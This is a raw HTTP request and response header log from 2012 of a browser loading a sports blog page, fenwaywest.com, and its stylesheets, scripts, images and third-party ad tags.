Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccae1-88b-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 2187
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/layout.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaef-ad3-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 2771
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/css/main.css HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 12 Oct 2012 01:54:45 GMT
Etag: &quot;226b76-353f-4cbd2f8d32340&quot;
Accept-Ranges: bytes
Content-Length: 13631
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=520266&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=66901 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=300X250&amp;cwpid=520266&amp;cwwidth=300&amp;cwheight=250&amp;cwpnet=1&amp;cwtagid=66901 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Mon, 19 Nov 2012 04:17:34 GMT
Content-Length: 8938
Connection: keep-alive
Set-Cookie: C2W4=CT; expires=Mon, 17-Dec-2012 04:17:34 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=520266&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=66902 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=160X600&amp;cwpid=520266&amp;cwwidth=160&amp;cwheight=600&amp;cwpnet=1&amp;cwtagid=66902 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Mon, 19 Nov 2012 04:17:34 GMT
Content-Length: 8938
Connection: keep-alive
Set-Cookie: C2W4=CT; expires=Mon, 17-Dec-2012 04:17:34 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /clip/js/dbg.vert.js HTTP/1.1

Host: player.athletixnation.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
x-amz-id-2: 1zGMOMnwjHhTuXGzt4/ED3Zfcb/4oMgsFMb4d5QPlV0V20BzUXc72HSEuwyKiiTY
x-amz-request-id: C50DC637413166EE
Date: Mon, 19 Nov 2012 04:17:36 GMT
x-amz-meta-cb-modifiedtime: Tue, 11 Sep 2012 02:07:14 GMT
Last-Modified: Tue, 11 Sep 2012 05:09:07 GMT
Etag: &quot;23c537c899f825f1ce1347f808d93463&quot;
Accept-Ranges: bytes
Content-Length: 5879
Server: AmazonS3
GET /cache/widgetkit/widgetkit-b4ef40fb.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 17:26:35 GMT
Etag: &quot;f613d3-c9f3-4ce8bf3ecc8c0&quot;
Accept-Ranges: bytes
Content-Length: 51699
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/menus.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae7-1363-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 4963
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/tools.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae0-1f55-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 8021
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/modules.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaf0-fa4-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 4004
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/gruden%20tennessee.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 11:20:46 GMT
Etag: &quot;791886-a682-4ce86d7a99f80&quot;
Accept-Ranges: bytes
Content-Length: 42626
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/conferexe%20expansion%20.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Mon, 19 Nov 2012 01:23:25 GMT
Etag: &quot;791472-abcd-4cecef6bcdd40&quot;
Accept-Ranges: bytes
Content-Length: 43981
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /Scripts/widget.js?id=924de7ea-1917-4b16-af38-f7a0a4352145&d=ZmVud2F5d2VzdC5jb20=&wid=1868 HTTP/1.1

Host: api.content.ad
GET /Scripts/widget.js?id=924de7ea-1917-4b16-af38-f7a0a4352145&amp;d=ZmVud2F5d2VzdC5jb20=&amp;wid=1868 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 02 Aug 2012 00:04:21 GMT
Accept-Ranges: bytes
Etag: &quot;b512335e4270cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:11 GMT
Content-Length: 2192
GET /media/system/js/mootools-core.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 13 Sep 2012 12:09:02 GMT
Etag: &quot;ecd35d-1786a-4c9942c467380&quot;
Accept-Ranges: bytes
Content-Length: 96362
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/oregonmascot.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 17 Nov 2012 01:05:56 GMT
Etag: &quot;791453-10438-4cea67c87a500&quot;
Accept-Ranges: bytes
Content-Length: 66616
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/background/dust.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccb07-11e-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 286
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/system.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaee-2a68-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 10856
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/custom.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccaec-a7-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 167
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/extensions.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccae3-6b4-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 1716
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/fehr%20bettmann.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 16 Nov 2012 22:54:40 GMT
Etag: &quot;791452-125dd-4cea4a7156c00&quot;
Accept-Ranges: bytes
Content-Length: 75229
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT; cw=cw
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://ak1.abmr.net/is/tag.contextweb.com?U=/TagPublish/getjs.aspx&amp;V=3-4v2%2fvFA114+hSG+mNkvg6XuFSxpO5hE94VD2d70cMKOaA1Vr4KEPMnxmgefGulUY&amp;I=D059FE3705F1C72&amp;D=contextweb.com&amp;01AD=1&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900
Date: Mon, 19 Nov 2012 04:17:35 GMT
Connection: keep-alive
Set-Cookie: C2W4=CT-1; expires=Mon, 17-Dec-2012 04:17:35 GMT; path=/; domain=.contextweb.com
GET /templates/yoo_bigeasy/css/print.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaed-1ad-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 429
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /media/widgetkit/js/jquery.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 20:50:16 GMT
Etag: &quot;ecd230-17421-4c68ae88a3200&quot;
Accept-Ranges: bytes
Content-Length: 95265
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/js/menu.php HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /templates/yoo_bigeasy/css/font1/chaparral.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:32 GMT
Etag: &quot;eccb15-1fd-4c65267723b00&quot;
Accept-Ranges: bytes
Content-Length: 509
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/font2/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:32 GMT
Etag: &quot;eccaf3-197-4c65267723b00&quot;
Accept-Ranges: bytes
Content-Length: 407
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/font3/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:34 GMT
Etag: &quot;eccb19-506-4c6526790bf80&quot;
Accept-Ranges: bytes
Content-Length: 1286
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/style.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae5-5e7-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 1511
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /images/ybn/badge_100.gif HTTP/1.1

Host: www.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/0.8.34
Content-Length: 3283
Last-Modified: Tue, 21 Aug 2012 18:49:43 GMT
Accept-Ranges: bytes
X-N: S
Date: Mon, 19 Nov 2012 04:17:35 GMT
Connection: keep-alive
GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&V=3-4v2%2fvFA114+hSG+mNkvg6XuFSxpO5hE94VD2d70cMKOaA1Vr4KEPMnxmgefGulUY&I=D059FE3705F1C72&D=contextweb.com&01AD=1&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: ak1.abmr.net
GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&amp;V=3-4v2%2fvFA114+hSG+mNkvg6XuFSxpO5hE94VD2d70cMKOaA1Vr4KEPMnxmgefGulUY&amp;I=D059FE3705F1C72&amp;D=contextweb.com&amp;01AD=1&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
